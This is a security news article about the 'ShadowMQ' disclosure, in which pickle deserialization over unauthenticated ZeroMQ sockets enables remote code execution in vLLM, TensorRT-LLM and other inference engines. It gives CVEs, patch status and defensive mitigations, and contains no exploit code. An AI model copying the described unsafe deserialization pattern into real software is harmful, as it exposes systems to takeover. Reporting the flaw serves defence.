ShadowMQ Flaw Exposes AI Inference Engines to Remote Code Execution

Summarize with:



Oligo Security researchers found a repeating, unsafe pattern in several AI inference frameworks that can allow remote code execution when unauthenticated ZeroMQ sockets deserialize Python objects.

The pattern, called ShadowMQ, centers on code that receives serialized Python objects over a network socket and immediately deserializes them with pickle or an equivalent method.

The combination of ZeroMQ’s recv_pyobj() (or similar) and Python’s pickle.loads() allows an attacker who can reach the ZMQ listener to deliver a crafted payload that executes arbitrary code on an inference node.

Oligo found the unsafe logic copied across projects, producing related vulnerabilities in multiple products: vLLM (CVE-2025-30165), NVIDIA TensorRT-LLM (CVE-2025-23254), Modular Max Server (CVE-2025-60455), and earlier issues in Meta’s Llama components (CVE-2024-50050).

Vendors issued fixes for several products: NVIDIA patched TensorRT-LLM in version 0.18.2, Modular published a corrective commit, and vLLM reduced exposure by switching engines by default. Some components remained unpatched at disclosure.

Because inference nodes often hold model weights and access internal storage, exploitation can enable model theft, lateral movement inside clusters, and deployment of persistent payloads such as cryptominers (see related analysis in Machine-Speed Security).

Recommended mitigations include applying vendor patches, preventing public exposure of ZMQ listeners (bind sockets to localhost or private interfaces), replacing pickle-based deserialization with safe formats (JSON, protobuf), and enabling ZMQ authentication/encryption (CURVE) or TLS-proxied transports.

Operators should also harden runtimes: run inference services with least privilege, add container and process isolation, and audit code for deserialization patterns such as pickle.loads and recv_pyobj during review and automated scans.

Defenders should monitor for unexpected inbound connections to ZMQ ports, instrument framework logs to surface deserialization calls and exceptions, and hunt for post-deserialization signs of compromise (unexpected Python child processes, new binaries, or unusual outbound connections).

Because the pattern spread through simple code reuse, long-term risk also requires process changes: secure-by-default patterns, stricter code review for copied snippets, and coordinated vendor disclosure and patching (see related cases in this article).

The original technical report is available from Oligo Security at https://www.oligo.security/blog/shadowmq-how-code-reuse-spread-critical-vulnerabilities-across-the-ai-ecosystem

“All contained nearly identical unsafe patterns: pickle deserialization over unauthenticated ZMQ TCP sockets,” Avi Lumelsky of Oligo Security said.